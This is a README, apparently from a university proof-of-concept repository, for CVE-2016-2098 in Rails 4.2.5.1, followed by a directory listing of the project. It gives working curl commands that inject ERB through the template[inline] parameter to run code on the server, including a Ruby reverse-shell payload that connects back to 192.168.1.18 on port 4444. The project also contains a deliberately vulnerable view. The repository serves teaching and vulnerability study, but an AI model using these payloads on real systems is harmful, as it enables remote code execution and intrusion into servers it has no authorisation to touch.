Proof of concept CVE-2016-2098# A Proof of Concept of vulnerability: CVE-2016-2098
University project created by @alejandro-marting
where we can check the vulnerability 2096
Using:
* rails 4.2.5.1
* view has a vulnerable code app/views/poc/render1.html.erb
![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)
##Execution:
In first place we need run the rails server with the following command:
```$ rvmsudo rails server -b 0.0.0.0 -p 80```
Now we can cause the remote code execution with the next command:
```$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'```
(A rooted file should be generate)
If you want try a reverse shell with ruby code inyection, you can run the
next command:
```
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
```
If you have any question contact with me please!
[4.0K] /data/pocs/2fdb9e9db758301e24cdcba4a6a0c1db4f63a0d9
├── [4.0K] app
│ ├── [4.0K] assets
│ │ ├── [4.0K] images
│ │ │ ├── [128K] Captura de pantalla de 2017-01-15 09:50:23.png
│ │ │ └── [ 18K] logo.png
│ │ ├── [4.0K] javascripts
│ │ │ ├── [ 661] application.js
│ │ │ ├── [ 211] poc.coffee
│ │ │ └── [ 211] welcome.coffee
│ │ └── [4.0K] stylesheets
│ │ ├── [ 686] application.css
│ │ ├── [ 174] poc.scss
│ │ └── [ 178] welcome.scss
│ ├── [4.0K] controllers
│ │ ├── [ 204] application_controller.rb
│ │ ├── [4.0K] concerns
│ │ ├── [ 68] poc_controller.rb
│ │ └── [ 52] welcome_controller.rb
│ ├── [4.0K] helpers
│ │ ├── [ 29] application_helper.rb
│ │ ├── [ 21] poc_helper.rb
│ │ └── [ 25] welcome_helper.rb
│ ├── [4.0K] mailers
│ ├── [4.0K] models
│ │ └── [4.0K] concerns
│ └── [4.0K] views
│ ├── [4.0K] layouts
│ │ └── [ 311] application.html.erb
│ ├── [4.0K] poc
│ │ ├── [ 101] render1.html.erb
│ │ └── [ 10] _template1.html.erb
│ └── [4.0K] welcome
│ └── [1.0K] index.html.erb
├── [4.0K] bin
│ ├── [ 129] bundle
│ ├── [ 268] rails
│ ├── [ 213] rake
│ ├── [ 805] setup
│ └── [ 488] spring
├── [4.0K] config
│ ├── [1.4K] application.rb
│ ├── [ 132] boot.rb
│ ├── [ 552] database.yml
│ ├── [ 150] environment.rb
│ ├── [4.0K] environments
│ │ ├── [1.6K] development.rb
│ │ ├── [3.2K] production.rb
│ │ └── [1.7K] test.rb
│ ├── [4.0K] initializers
│ │ ├── [ 486] assets.rb
│ │ ├── [ 404] backtrace_silencers.rb
│ │ ├── [ 129] cookies_serializer.rb
│ │ ├── [ 194] filter_parameter_logging.rb
│ │ ├── [ 647] inflections.rb
│ │ ├── [ 156] mime_types.rb
│ │ ├── [ 157] session_store.rb
│ │ └── [ 517] wrap_parameters.rb
│ ├── [4.0K] locales
│ │ └── [ 634] en.yml
│ ├── [1.6K] routes.rb
│ └── [ 964] secrets.yml
├── [ 153] config.ru
├── [ 565] data_log
├── [4.0K] db
│ ├── [ 0] development.sqlite3
│ └── [ 343] seeds.rb
├── [1.5K] Gemfile
├── [4.1K] Gemfile.lock
├── [4.0K] lib
│ ├── [4.0K] assets
│ └── [4.0K] tasks
├── [4.0K] log
│ └── [ 91K] development.log
├── [4.0K] public
│ ├── [1.5K] 404.html
│ ├── [1.5K] 422.html
│ ├── [1.4K] 500.html
│ ├── [ 0] favicon.ico
│ └── [ 202] robots.txt
├── [ 249] Rakefile
├── [1.1K] README.md
├── [4.0K] tmp
│ └── [4.0K] cache
│ └── [4.0K] assets
│ └── [4.0K] sprockets
│ └── [4.0K] v3.0
│ ├── [4.0K] _0
│ │ └── [1.1K] _0wjgrLtFD2GoEt2xvgMT8gVPhuhFy5CrWYUfJN7gOk.cache
│ ├── [4.0K] 04
│ │ └── [ 86K] 04F1M8YB2Dw2f5lZwZ92J6EwZ6KcGkL0tMoxa38AwuQ.cache
│ ├── [4.0K] 0U
│ │ └── [ 159] 0UE_37X-uaPNJ2FguYalR20D4mhXBFbqacEwz0-blIA.cache
│ ├── [4.0K] 1-
│ │ └── [1.1K] 1-EBaTKRQyOjHxT6_ZmRf8dceo-eodWnDxGBY22pLjY.cache
│ ├── [4.0K] 1Z
│ │ └── [6.9K] 1ZsXsp9b3fNmx0b3rVwyplnpE9Ek4UOshXeSGiVY_AE.cache
│ ├── [4.0K] 38
│ │ └── [ 218] 386fTXSSGVwOIucP7NQZ2yqMl0x22mQWQn2rLkdZeDM.cache
│ ├── [4.0K] 42
│ │ └── [2.0K] 42mwsLe6WOJYsQQguPOe6szdcY1pBXgLcf_wuOXHnUA.cache
│ ├── [4.0K] 48
│ │ └── [ 297] 48T13KvD09AS3y7QQcSGB47VoQ0fxgGYF39Mq1JEQ5U.cache
│ ├── [4.0K] 4e
│ │ └── [ 847] 4eoE--ka895ZHqKLRmAfxqeJNUWSNLdDhmpWkARAQMA.cache
│ ├── [4.0K] 4K
│ │ └── [ 36] 4K41QHnRfADWv3PO_eWT47-eSA9BXqs-Q_8JGffuKhw.cache
│ ├── [4.0K] 4R
│ │ └── [ 145] 4R3WJ-nw4EpKuFEu3xJmPEco1rEJ12wXcb655MrxCms.cache
│ ├── [4.0K] 52
│ │ └── [ 98K] 52mhaFaBVCdfNhfL3K8HhqmU5DtR5HwWtj8FsGbf5Po.cache
│ ├── [4.0K] 5c
│ │ └── [ 255] 5cWmSbE2lOmA2_-6ZfmlX2Lh4PaR6dkYoW3dxjzpNlk.cache
│ ├── [4.0K] 5L
│ │ └── [ 930] 5Lly_CA8DZvPhQV2jDQx-Y6P_y3Ygra9t5jfSlGhHDA.cache
│ ├── [4.0K] 5P
│ │ └── [2.0K] 5PcHPOoux9crrbxb75iZDv1vGhHzXgSPYumkMd7VycA.cache
│ ├── [4.0K] 6c
│ │ └── [ 146] 6c1rCFNVNth-3gbg1VfqpD973givaFDpQQP5noj4-lQ.cache
│ ├── [4.0K] 6Y
│ │ └── [ 36] 6YGSLH1AtEXv65-vtJqvAI7_edmfjVoyF32z6AQyliA.cache
│ ├── [4.0K] 7I
│ │ └── [ 146] 7I9W_k655hdMCEAk6_IJB8DcrzmTEcy-SrBvFvtUCEM.cache
│ ├── [4.0K] 8C
│ │ └── [1.9K] 8CGemgX70mRcPjIFlRg1x3fL6vExjNU8sQ25Ns_oy7o.cache
│ ├── [4.0K] 8g
│ │ └── [ 138] 8gvyw0yEEwKK4mAuhtWQUJYrJ5ivpc-eCbzPmCp03WA.cache
│ ├── [4.0K] 8q
│ │ └── [ 223] 8qrg-w7zRe_bV83S0dGx0jx6NG3K6SnBwVBcTTjJdvY.cache
│ ├── [4.0K] 96
│ │ └── [ 159] 96f_Qo1xYBdKTPVNwgZ5KcaIEAGLtRgCoE5vgP6Oi-w.cache
│ ├── [4.0K] A-
│ │ └── [ 36] A-Iv8W9h_tqdR7FnTa0RYKyHQ_w1snd0jQh0lFxszOw.cache
│ ├── [4.0K] Al
│ │ └── [ 36] Al0n8NLoyu4mXhGTCypwT2r1e2FGd1AchShAS8dL0wc.cache
│ ├── [4.0K] AP
│ │ └── [ 477] APY89OAPJx9A3D3xcCoktvEvQUs7NcWChYXnjjjPzz0.cache
│ ├── [4.0K] ax
│ │ └── [ 130] axhaNLBezm2sQhvGvOZPtMeVNE6fEV7XZgzO4fZRAxg.cache
│ ├── [4.0K] B_
│ │ └── [ 36] B_DDzqXo8KG9dkRw2DO75Oo69emZBkfWuLfdIo2kyWw.cache
│ ├── [4.0K] B6
│ │ └── [ 98K] B6F7q51M9Y1IaKfPzYhF8hyMcgUSN9wORaPYxJKerjo.cache
│ ├── [4.0K] B8
│ │ └── [ 36] B8K7A1dortUufioQo0cX7MfX-VKmC6crZVykUwwKVOo.cache
│ ├── [4.0K] BA
│ │ └── [ 36] BAM7esBP22vk8nHS-PRTPMVvZsnnFvPfBLArsEZoCfg.cache
│ ├── [4.0K] cC
│ │ └── [ 227] cCWzACoMLbHAWSqc96Q-QZAgsVtE-jxVEZ49bMdxAxc.cache
│ ├── [4.0K] cD
│ │ └── [ 159] cDIHP2JaACOtgw0ge9TSpYq0dqXWr_gSBm5JN5x3ooI.cache
│ ├── [4.0K] cr
│ │ └── [ 154] crTRN4bh_daYQUTa0bXo-E6uTHRwwo386A0CW5bzPKs.cache
│ ├── [4.0K] dn
│ │ └── [ 192] dndzzava103PP8FPkGBNWn37GIoNOQn6HSl-acLEj1s.cache
│ ├── [4.0K] ds
│ │ └── [ 98K] dsLzodIPAowHmJKgsvb0Fm5--_tRwqln5nK5kVHWIdY.cache
│ ├── [4.0K] DS
│ │ └── [ 960] DSOLSc6A5RVSmvM415eEWAWG_AgOvZcLZOXQjsXyWQA.cache
│ ├── [4.0K] dT
│ │ └── [ 36] dT11Svr8I-APBcuiShc32k7UWOwwyV186CvXXdOP1Aw.cache
│ ├── [4.0K] EB
│ │ └── [ 522] EBtbhweQl74JQNkwFL3ahZH_9x44ceqa9hOT8lQ_SfM.cache
│ ├── [4.0K] ee
│ │ └── [ 41] ee9ZqYM3D8GORlAyhQhVVtyNcEArBAXuuAcPhnfTNT8.cache
│ ├── [4.0K] Fl
│ │ └── [1.1K] FlTwDWNYtmicNCaUVmkDqC7TwafHAB3UEaEatAmmi4g.cache
│ ├── [4.0K] fp
│ │ └── [ 36] fpkUKQRlEqwWDEjbDcY6zPJltuE8xhfiHWxpA51sYO0.cache
│ ├── [4.0K] gH
│ │ └── [ 36] gHz1DX4XzQVSdHhS2QPpRmwx8ueQrluJM4PN6q3c-kU.cache
│ ├── [4.0K] GH
│ │ └── [1.1K] GHjq1_XWeHLZd26ki0xRhtWR2dx8Co26QDiwpEfDyTQ.cache
│ ├── [4.0K] Gl
│ │ └── [ 36] GlTkFg6BN1qfxNqSQnRWGotNj2jeuHWkcZCldZsQ_Ms.cache
│ ├── [4.0K] GM
│ │ └── [ 98K] GMuHKJc-v_dmoJm7oNjVosQ77Zl3JaifdHwPnmIqmpA.cache
│ ├── [4.0K] gx
│ │ └── [ 301] gx4JBuwLryMYfm_VSni_gVanepbWrgVM9LphCChGmko.cache
│ ├── [4.0K] Hw
│ │ └── [ 36] Hw5qGNhksX_pK88gnrW2Dakxdyp9Pvx4aHQPROB0DtQ.cache
│ ├── [4.0K] i1
│ │ └── [ 144] i1Qjfnr8cWhxb9cUFx3x1DGlk5u484rNVsWwmoojg-4.cache
│ ├── [4.0K] I9
│ │ └── [ 259] I9Ji3hKbhOCXCg5Or8mdoK35rCPPZCSeNUUiuHJ176w.cache
│ ├── [4.0K] iK
│ │ └── [ 158] iKUs4Xwpny9WyjwuXgPrHCreKdksTOJC-blZtkxdjiY.cache
│ ├── [4.0K] IN
│ │ └── [ 158] INfZdihFpQjdJwZla_DPh99iZGHea3y0xW9QY8eEcsU.cache
│ ├── [4.0K] J4
│ │ └── [ 36] J4IfCuP3GMHjPnhatD_HJZ7p2P1_QabtrDWh7y1dsCA.cache
│ ├── [4.0K] JA
│ │ └── [ 145] JASo9VYYFHvQva697AvavkLcbppMY_nLoxtv_0kXDPA.cache
│ ├── [4.0K] jc
│ │ └── [ 867] jcqxOrNEEpBL-bao_lXwPAPiD1nQHsik4mcmKUDdSLQ.cache
│ ├── [4.0K] jn
│ │ └── [ 130] jnBeUWz0iNoN_Cw9uOnRt88Ekp8AYQTsDCPNSGHrUW0.cache
│ ├── [4.0K] Jq
│ │ └── [ 36] JqwhoilmIih3U92QWNRcB_g80O2lGffr65vC4KXomT8.cache
│ ├── [4.0K] KP
│ │ └── [ 144] KPftm_rwGZDbgVSWxwYn2DeQJZyNMKHAJYtTbH-nFjg.cache
│ ├── [4.0K] kS
│ │ └── [ 518] kSkCWaAJCcTgZ_AhrRCjZhNtkE12cubiq70uNtditqk.cache
│ ├── [4.0K] lg
│ │ ├── [ 319] lgAe9IWoXhDolaHO5mQbRZbBFZC4ZX6K9jlI3C2QqxM.cache
│ │ └── [ 36] lgcHS8h-b5rsPGnFplY30NfHrqqKaqaBV_0DTUhV2IM.cache
│ ├── [4.0K] Ml
│ │ └── [ 36] MlDqN-gkOEucNup7a0_wZElc7Y4KzKcYxIAqWYoBIAg.cache
│ ├── [4.0K] MZ
│ │ └── [1.1K] MZ7oeg_1Q12pvRh8KHWJt_OOH-548RvXnUwsgaop7wk.cache
│ ├── [4.0K] nJ
│ │ └── [ 707] nJ7IXdsb4hI-IPKjCnGSoQ9CgFT5xerKKqJq-NUSnw8.cache
│ ├── [4.0K] -O
│ │ └── [ 941] -O3psbkHndP1O1uSSfDNsklOM9mU1WlvuyOKiCt5irY.cache
│ ├── [4.0K] OI
│ │ └── [ 670] OI6uxGcnsKavdWTtwDAasU3wPx8QXhzBgV0X2n1KjMQ.cache
│ ├── [4.0K] OR
│ │ └── [ 98K] OR4aX6EXsjsqR-j4d3e8d90kKt9CH2DxuBuPeUGU_b0.cache
│ ├── [4.0K] P_
│ │ └── [ 36] P_cTRidr6Gw5BBRUKY23l0XUdAifxibEWwGvSsoSwGk.cache
│ ├── [4.0K] pF
│ │ └── [ 158] pFzpQxoCmRxceEFBplhVKBlVn2q-wTTLaosw1pAaVZ0.cache
│ ├── [4.0K] pg
│ │ └── [6.1K] pgNfrjk3wkfaP9GrSfifKCUmICKYzfXj81RNOzuTgN8.cache
│ ├── [4.0K] qc
│ │ └── [ 142] qcylLXqLcS1qfx2Lb7Rupi720rTU9g83FL6gXe9gpFc.cache
│ ├── [4.0K] qf
│ │ └── [ 961] qfLlG3Q03FFD-Xcly7mor9GdAVhSHRFTW3pCjsd9FP0.cache
│ ├── [4.0K] qs
│ │ └── [2.2K] qs8lodpAL78PLrxu15_6FPwpN2fbGpg7SVTvf6I43yg.cache
│ ├── [4.0K] _r
│ │ └── [ 158] _rAeX9VEUK-DPCkXexVU4UfhVQ9PAT3ZvdXyu3RBzxc.cache
│ ├── [4.0K] Rl
│ │ └── [2.2K] RlA7BgvmiZJTJe_z6Ws3d2SeSdIULRA3bNXO1Jr9atw.cache
│ ├── [4.0K] ru
│ │ └── [ 36] ru8CAmzoE9YT2k5Qj7QCfvLJITqYP0HwTTQcqggHpAs.cache
│ ├── [4.0K] Su
│ │ └── [6.3K] SuhtC6f7E2-1SXl4bkRvOKqhzFKTjPvbglVtjbjV6WQ.cache
│ ├── [4.0K] Ti
│ │ └── [ 36] TitFLiZLjQ1QIHkCi8rOL5VB12w3mhOa6iAC4Wr7zvc.cache
│ ├── [4.0K] VF
│ │ └── [ 212] VFAdBdVwb_rZPOeO7H4uco-IKs2GuiuEbXxViBkQixA.cache
│ ├── [4.0K] -x
│ │ └── [ 144] -xJE7Qdv-klqvoisr-iuqkooxmEGYWYBQcCec9Qlpzk.cache
│ ├── [4.0K] xc
│ │ └── [ 36] xc4ppc_7iT9THgcnRSMFowndIf6yiCJqZLAVCExoIAE.cache
│ ├── [4.0K] Xt
│ │ └── [ 216] XthS8k_5jkb5QdymES6MX4bdSS3923q5Bxxg2viq-ng.cache
│ ├── [4.0K] Ym
│ │ └── [ 98K] YmT4R6M4SC1-H5jnucBHXDzfZzYsFnXH_Mn1Um8_nLA.cache
│ ├── [4.0K] Yq
│ │ └── [ 119] Yq4pzVaKuQZLeUsmsZcmPS8nqnT8r9lOd4CRv472pTg.cache
│ └── [4.0K] yx
│ └── [1.7K] yxoSBUdKeiyBR4A1uyLJMnDHvFLQ3Lqy-NXuo4K0bfc.cache
└── [4.0K] vendor
└── [4.0K] assets
├── [4.0K] javascripts
└── [4.0K] stylesheets
118 directories, 139 files